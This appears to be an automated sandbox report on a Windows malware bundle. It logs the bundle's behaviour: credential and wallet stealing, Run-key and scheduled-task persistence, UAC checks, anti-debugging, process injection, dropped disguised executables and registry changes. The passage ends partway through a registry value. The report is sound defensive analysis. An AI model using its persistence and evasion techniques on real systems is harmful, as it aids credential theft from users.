N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NC4QN.tmp\setup_2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-S5KLF.tmp\setup_2.tmp N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\KPzSScVqZ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\KPzSScVqZ.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FAFC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FAFC.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" C:\ProgramData\8592089.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Mozilla Maintenance Service\\Bubyqovele.exe\"" C:\Users\Admin\AppData\Local\Temp\is-1MTC6.tmp\46807GHF____.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\EA22.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\Tasks\services64 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #2 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #4 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #5 c:\windows\system32\svchost.exe N/A
File created C:\Windows\SysWOW64\rdpclip.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #1 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 29965777099153F4 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\AdvancedUpdater c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #3 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #6 c:\windows\system32\svchost.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\EA22.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3700 set thread context of 4720 N/A C:\ProgramData\2701259.exe C:\ProgramData\2701259.exe
PID 3984 set thread context of 4604 N/A \??\c:\windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 5080 set thread context of 4852 N/A C:\ProgramData\8836247.exe C:\ProgramData\8836247.exe
PID 6128 set thread context of 508 N/A C:\Users\Admin\AppData\Local\Temp\is-D9E1S.tmp\postback.exe C:\Windows\SysWOW64\explorer.exe
PID 1780 set thread context of 2868 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-DKOK5.tmp\ultramediaburner.tmp N/A
File created C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Mozilla Maintenance Service\Bubyqovele.exe.config C:\Users\Admin\AppData\Local\Temp\is-1MTC6.tmp\46807GHF____.exe N/A
File created C:\Program Files (x86)\UltraMediaBurner\is-63A75.tmp C:\Users\Admin\AppData\Local\Temp\is-DKOK5.tmp\ultramediaburner.tmp N/A
File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-DKOK5.tmp\ultramediaburner.tmp N/A
File created C:\Program Files\MSBuild\NUKMIWBYRX\ultramediaburner.exe C:\Users\Admin\AppData\Local\Temp\is-1MTC6.tmp\46807GHF____.exe N/A
File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe C:\Users\Admin\AppData\Local\Temp\is-DKOK5.tmp\ultramediaburner.tmp N/A
File created C:\Program Files (x86)\Mozilla Maintenance Service\Bubyqovele.exe C:\Users\Admin\AppData\Local\Temp\is-1MTC6.tmp\46807GHF____.exe N/A
File created C:\Program Files (x86)\UltraMediaBurner\is-5C3SE.tmp C:\Users\Admin\AppData\Local\Temp\is-DKOK5.tmp\ultramediaburner.tmp N/A
File created C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-S5KLF.tmp\setup_2.tmp N/A
File created C:\Program Files (x86)\FarLabUninstaller\is-F8LP3.tmp C:\Users\Admin\AppData\Local\Temp\is-S5KLF.tmp\setup_2.tmp N/A
File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-S5KLF.tmp\setup_2.tmp N/A
File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MSBuild\NUKMIWBYRX\ultramediaburner.exe.config C:\Users\Admin\AppData\Local\Temp\is-1MTC6.tmp\46807GHF____.exe N/A
File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f75d1fa.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\Debug\ESE.TXT C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\Installer\f75d1f7.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB87.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI14A2.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIDA36.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIDB05.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI6F2.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE674.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI645.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI889.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp C:\Windows\SysWOW64\WerFault.exe N/A
File opened for modification C:\Windows\Debug\ESE.TXT \??\c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\Installer\MSIE4FC.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\Installer\f75d1f7.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE2C7.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\Installer\MSID5BF.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIDAE5.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID9D7.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE373.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\Installer\MSIE685.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\Installer\MSIDA76.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIFDD7.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\Debug\ESE.TXT C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File opened for modification C:\Windows\Installer\MSIDAA5.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE401.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE96.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI1FEE.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19c6762a08beae.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19c6762a08beae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\vhsgwrt N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\vhsgwrt N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19c6762a08beae.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\vhsgwrt N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\vhsgwrt N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\vhsgwrt N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\vhsgwrt N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\vhsgwrt N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\vhsgwrt N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\vhsgwrt N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\KPzSScVqZ.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\KPzSScVqZ.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\FAFC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\FAFC.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19e6a852f849bb2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19e6a852f849bb2.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\svchost.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\browser_broker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\browser_broker.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\16\52C64B7E \??\c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache \??\c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\svchost.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\svchost.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections \??\c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache \??\c:\windows\system32\svchost.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "- 0001 ! 0002 & 0003 , 0004 . 0005 ? 0006 _ 0007 + 0008 * 0009 1 000A 2 000B 3 000C 4 000D 5 000E a 000F ai 0010 an 0011 ang 0012 ao 0013 ba 0014 bai 0015 ban 0016 bang 0017 bao 0018 bei 0019 ben 001A beng 001B bi 001C bian 001D biao 001E bie 001F bin 0020 bing 0021 bo 0022 bu 0023 ca 0024 cai 0025 can 0026 cang 0027 cao 0028 ce 0029 cen 002A ceng 002B cha 002C chai 002D chan 002E chang 002F chao 0030 che 0031 chen 0032 cheng 0033 chi 0034 chong 0035 chou 0036 chu 0037 chuai 0038 chuan 0039 chuang 003A chui 003B chun 003C chuo 003D ci 003E cong 003F cou 0040 cu 0041 cuan 0042 cui 0043 cun 0044 cuo 0045 da 0046 dai 0047 dan 0048 dang 0049 dao 004A de 004B dei 004C den 004D deng 004E di 004F dia 0050 dian 0051 diao 0052 die 0053 ding 0054 diu 0055 dong 0056 dou 0057 du 0058 duan 0059 dui 005A dun 005B duo 005C e 005D ei 005E en 005F er 0060 fa 0061 fan 0062 fang 0063 fei 0064 fen 0065 feng 0066 fo 0067 fou 0068 fu 0069 ga 006A gai 006B gan 006C gang 006D gao 006E ge 006F gei 0070 gen 0071 geng 0072 gong 0073 gou 0074 gu 0075 gua 0076 guai 0077 guan 0078 guang 0079 gui 007A gun 007B guo 007C ha 007D hai 007E han 007F hang 0080 hao 0081 he 0082 hei 0083 hen 0084 heng 0085 hong 0086 hou 0087 hu 0088 hua 0089 huai 008A huan 008B huang 008C hui 008D hun 008E huo 008F ji 0090 jia 0091 jian 0092 jiang 0093 